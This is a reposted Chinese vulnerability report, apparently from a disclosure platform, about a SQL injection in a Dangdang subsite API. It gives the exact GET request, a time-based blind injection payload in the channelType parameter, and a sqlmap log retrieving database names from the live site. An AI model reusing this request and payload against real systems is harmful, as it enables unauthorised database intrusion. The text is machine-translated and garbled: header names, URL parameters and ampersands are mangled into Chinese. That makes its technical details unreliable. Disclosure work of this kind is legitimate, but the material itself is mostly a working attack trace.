当当网分站存在SQL注入

责声明">
漏洞标题 当当网分站存在SQL注入 相关厂商 当当网 漏洞作者 Vinc 提交时间 2016-04-25 09:38 公开时间 2016-06-09 11:50 漏洞类型 SQL注射漏洞 危害等级 高…
漏洞标题 当当变电站有SQL注入 相关制造商 当当网 漏洞作者 时Vinc 提交时间 2016-04-25 09: 38 公共时间 2016-06-09 11: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Sql注入 漏洞详细信息 GET包如下: GET /media/api.go?action=mediaRankingList&listType=sale&channelType=*&permanentId=20151109120332208112113523718686951&returnType=json&channelId=70000&clientVersionNo=5.0.0&deviceType=DDDS_ALL&start=0&end=19 HTTP/1.1 接受: */* Referer:http://e.dangdang.com/rank_detail_page.html X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21 Cookie: __permanent_id=20160423211433821241934195768855298; ddscreen=1; MDD_channelId=70000; MDD_fromPlatform=307; dest_area=COUNTRY_ID%3D9000%26province_id%3D173%26city_id%20%3D0%26district_id%3D0%26town_id%3D0 连接:保持活动状态 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,en,* 主机: e.dangdang.com Pragma:无缓存 缓存控制:无缓存 参数:channelType 漏洞证明: Sqlmap从存储的会话:恢复以下注入点 --- 参数:#1 *(URI) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷:http://e.dangdang.com: 80/media/api.go?action=mediaRankingList& list Ype=sale& channelType='AND(SELECT * FROM(SELECT(SLEEP(5)))HUfh)AND'aSqF'='a QF&安培; permanentId=20151109120332208112113523718686951&安培;返回类型=JSON&安培;的channelID=70 00安培; clientVersionNo=5.0.0&安培;设备类型=DDDS_ALL&安培;开始=0&安培;端=19 --- [09: 45: 07] [INFO]测试MySQL 您是否希望sqlmap尝试优化DBMS延迟响应的值(选项 '--time秒')? [Y/N] [09: 45: 14] [INFO]确认MySQL [09: 45: 14] [警告]不要强调网络适配器dur非常重要 从对等方接收数据时失败 [09: 47: 59] [ERROR]检测到无效字符。重试. [09: 47: 59] [警告]将时间延迟增加到3秒 一个 [09: 48: 05] [INFO]检索到:数字 [09: 49: 55] [INFO]检索到:数字 [09: 51: 46] [ERROR]检测到无效字符。重试. [09: 51: 46] [警告]将时间延迟增加到4秒 L_ [09: 53: 13] [ERROR]检测到无效字符。重试. [09: 53: 13] [警告]将时间延迟增加到5秒 搜索 [09: 55: 21] [INFO]检索到: dpp [09: 57: 30] [ERROR]检测到无效字符。重试. 从对等方接收数据时失败
  • 发表于 2016-07-17 08:00
  • 阅读 ( 477 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章